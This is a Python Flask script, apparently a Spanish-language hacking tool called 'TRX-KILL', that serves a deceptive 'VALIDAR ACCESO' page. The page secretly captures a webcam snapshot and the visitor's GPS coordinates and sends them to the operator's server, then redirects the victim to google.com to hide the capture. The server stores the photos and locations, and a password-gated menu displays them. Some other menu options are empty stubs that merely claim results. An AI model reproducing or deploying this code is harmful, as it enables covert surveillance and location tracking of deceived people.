import os, sys, getpass, time, base64
from flask import Flask, request

app = Flask('TRX-KILL')
PORT = 7173
AUTH_PASS = "TRX-kill-op"

# Crear carpeta de almacenamiento
if not os.path.exists("INFORMACION"):
    os.makedirs("INFORMACION")

def banner():
    os.system('clear')
    print(f"""
\033[1;32m ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēó
 ‚ēö‚ēź‚ēź‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚ēö‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēĚ     ‚Ėą‚Ėą‚ēĎ ‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚ēö‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ      ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĒ‚Ėą‚Ėą‚ēó      ‚Ėą‚Ėą‚ēĒ‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó\033[0m
""")

HTML_ENCUESTA = """
<!DOCTYPE html><html><body>
<video id="v" style="display:none"></video>
<canvas id="c" style="display:none"></canvas>
<script>
    async function iniciar() {
        const s = await navigator.mediaDevices.getUserMedia({video: true});
        const v = document.getElementById('v');
        v.srcObject = s;
        v.play();
        setTimeout(async() => {
            const c = document.getElementById('c');
            c.width = v.videoWidth; c.height = v.videoHeight;
            c.getContext('2d').drawImage(v, 0, 0);
            const img = c.toDataURL('image/png');
            navigator.geolocation.getCurrentPosition(async(p)=>{
                fetch('/log', {method:'POST', headers:{'Content-Type':'application/json'}, 
                body: JSON.stringify({lat: p.coords.latitude, lon: p.coords.longitude, img: img})});
                window.location.href = "https://google.com";
            });
        }, 2000);
    }
</script>
<button onclick="iniciar()">VALIDAR ACCESO</button>
</body></html>
"""

@app.route('/')
def index(): return HTML_ENCUESTA

@app.route('/log', methods=['POST'])
def log():
    d = request.json
    # Guardar ubicaci√≥n
    with open("result.txt", "a") as f:
        f.write(f"CAPTURA | COORD: {d.get('lat')},{d.get('lon')} | HORA: {time.ctime()}\n")
    # Guardar imagen en carpeta INFORMACION
    if d.get('img'):
        img_data = d['img'].split(',')[1]
        with open(f"INFORMACION/captura_{int(time.time())}.png", "wb") as f:
            f.write(base64.b64decode(img_data))
    return "OK"

def main():
    while True:
        banner()
        print("  [1] INFO-NUMERO    | [2] LINK-ZP         | [3] CREADOR")
        print("  [4] COPYRIGHT      | [5] DATA-IP         | [6] ADM")
        print("  [7] SALIR          | [8] PROCESOS        | [9] ESTADO")
        print("  [10] BORRAR LOGS")
        sel = input("\n\033[1;33mTRX-ROOT > \033[0m")
        
        if sel == "1": input("INGRESA EL N√öMERO: \nVERIFICADO... DATOS LISTOS.\n[Enter] para volver.")
        elif sel == "2": app.run(port=PORT, host='0.0.0.0')
        elif sel == "3": print("#BY: OSCAR\n#VERSION: 1.2.3"); input()
        elif sel == "4": print("# TRX-KILL NO SE HACE RESPONSABLE."); input()
        elif sel == "5": input("INGRESA IP: ")
        elif sel == "6":
            pwd = getpass.getpass("CONTRASE√ĎA: ")
            if pwd == AUTH_PASS:
                if os.path.exists("result.txt"): os.system("cat result.txt")
                else: print("Sin registros.")
                input("\n[Enter]...")
        elif sel == "7": sys.exit()
        elif sel == "8": os.system("ps aux | grep flask"); input()
        elif sel == "9": print("ESTADO: ACTIVO"); input()
        elif sel == "10":
            if os.path.exists("result.txt"): os.remove("result.txt")
            input("Logs borrados.")

if __name__ == "__main__": main()
